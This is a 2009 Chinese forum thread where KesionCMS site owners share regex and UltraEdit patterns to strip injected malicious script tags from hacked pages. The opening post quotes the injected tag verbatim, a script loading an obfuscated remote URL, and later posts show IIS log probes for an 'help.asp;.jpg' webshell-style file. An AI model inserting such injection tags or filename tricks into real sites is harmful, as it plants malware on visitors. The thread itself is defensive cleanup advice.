账号通
    

账号  

密码  

9023

查看

28

回复
主题:三分钟清除您网站中木马的页面,正则朋友请看 [收藏主题] 本贴被认定为精华 转到:  
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 16:39:00   | 只看该作者 查看该作者主题 楼主 

<script src="http://www.icxxw.com/ima%67es/lo%67o.swf" type="text/javascript" language="JavaScript" id="seraph5script9727"  ></script>



删除所有script或iframe开头的有效,正确的正则:


<(script|iframe) +[^>]*www.icxxw.com[^>]*>[^<]*</\1>


或者更快捷全面的是:


<(script|iframe) +[^>]*seraph[^>]*>[^<]*</\1>



*后面改成你想要包含的字符,这样就已经清除了.asp,.html,.html的木马了


 


剩下的就是.js文件了
那么删除所有
document.writeln('<script language="JavaScript" src="http://www.icxxw.co%6D/i%6Dages/logo.swf" type="text/javascript" id="seraph6script7639"  ><\/script>');


这个正确的正则应该是:
???
请官方或能人回答这个表达式,谢谢


 


也就是前后多了:document.writeln('和');


若能突破,将会是最快的清除现在科讯中马的页面的方法!


 


 


 


 


 


 


 


 


最终解决方法如下:三分钟搞定


 


 


 


ultraedit在文件中替换,选ultraedit正则:


 


搜搜索文档类型:*.asp;*.htm;*.html;*.js;


 


 


第一正则:document.writeln('<script*seraph*><\/script>');


 


 


第二正则:<script*seraph*></script>


 


2个按钮中马页面统统恢复,不用谢我,好东西一起分享!


 


 


 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
kkynietg 当前离线

217

主题

0

广播

1

粉丝
添加关注
级别:二年级

用户积分:1242 分
登录次数:48 次
注册时间:2006/12/29
最后登录:2016/5/11
kkynietg 发表于:2009/9/29 17:01:00   | 只看该作者 查看该作者主题 沙发 
科汛在线商城系统(NET)
其实一次挂马的代码都是一样的,不用正则也可以很快替换完,emedit、ultraedit32 、editplus等等都支持多文件扫描替换
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
keaini 当前离线

220

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:1327 分
登录次数:9 次
注册时间:2009/9/14
最后登录:2009/10/24
keaini 发表于:2009/9/23 13:52:00   | 只看该作者 查看该作者主题 藤椅 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
fqceo 当前离线

229

主题

2

广播

0

粉丝
添加关注
级别:二年级

用户积分:1565 分
登录次数:117 次
注册时间:2009/6/18
最后登录:2013/10/10
fqceo 发表于:2009/9/16 4:52:00   | 只看该作者 查看该作者主题 板凳 
科汛在线商城系统(NET)
妈的,最近针对科讯的木马很多。。漏洞啊。。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rzkgj 当前离线

88

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:931 分
登录次数:82 次
注册时间:2007/6/5
最后登录:2015/4/4
rzkgj 发表于:2009/9/15 21:30:00   | 只看该作者 查看该作者主题 报纸 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 19:22:00   | 只看该作者 查看该作者主题 地板 
科汛在线考试系统(NET)

ultraedit在文件中替换,选ultraedit正则:

 

搜搜索文档类型:*.asp;*.htm;*.html;*.js;

 

 

第一正则:document.writeln('<script*seraph*><\/script>');

 

 

第二正则:<script*seraph*></script>

 

2个按钮中马页面统统恢复,不用谢我,好东西一起分享!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
shixt 当前离线

102

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:938 分
登录次数:83 次
注册时间:2007/6/5
最后登录:2022/8/25
shixt 发表于:2009/9/15 22:59:00   | 只看该作者 查看该作者主题 7楼 
科汛在线商城系统(NET)

这个方法不可靠

 

会把 <script src="/ks_inc/ajax.js" type="text/javascript"></script>
这个也过滤的

 

我考虑过楼主的方法

 

不可行的

 

治标不治本

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/16 17:41:00   | 只看该作者 查看该作者主题 8楼 
做在线知识付费 选科汛云开店

2009-09-16 07:51:03 W3SVC2111342725 212.184.32.19 POST /cla/Images/Pannel/help.asp;.jpg - 80 - 58.61.36.103 - 404 0 2


jbywmanage


2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /fqvxservusu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /puzbsu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /lqapservu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /bbs/ikwaservu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /jhykservu.aspx - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /bbs/kzeyservu.aspx - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:56 W3SVC1494564086 212.184.32.19 GET /nlpfservu.php - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:56 W3SVC1494564086 212.184.32.19 GET /bbs/pgiyservu.php - 80 - 125.64.220.102 Mozilla/4.0 301 0 64

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/16 17:14:00   | 只看该作者 查看该作者主题 9楼 
科汛智能建站系统
help.asp.jpg删除了又有,而且不是在uploadfiles目录,是很多目录都有,最少4个目录
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
一生有你 当前离线

10439

主题

0

广播

18

粉丝
添加关注
级别:版主

用户积分:72521 分
登录次数:1969 次
注册时间:2006/7/1
最后登录:2021/8/25
一生有你 发表于:2009/9/16 17:12:00   | 只看该作者 查看该作者主题 10楼 
以下是引用abc1988在2009-9-16 17:07:00的发言:
后门文件在哪里?请知道的朋友互相告知!谢谢

 

每个网站被放的位置可能不同,先用后台的在线木马查找

 

还有uploadfiles目录下,应该有存在*.asp;*.jpg之类的文件,要及时删除

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.25000秒 powered by KesionCMS 9.0